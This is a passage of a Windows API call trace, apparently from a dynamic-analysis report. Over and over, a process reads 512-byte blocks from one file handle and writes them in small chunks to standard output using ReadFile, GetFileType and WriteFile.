lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.141] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.142] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.143] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.144] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.145] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.146] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.147] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.148] _get_osfhandle 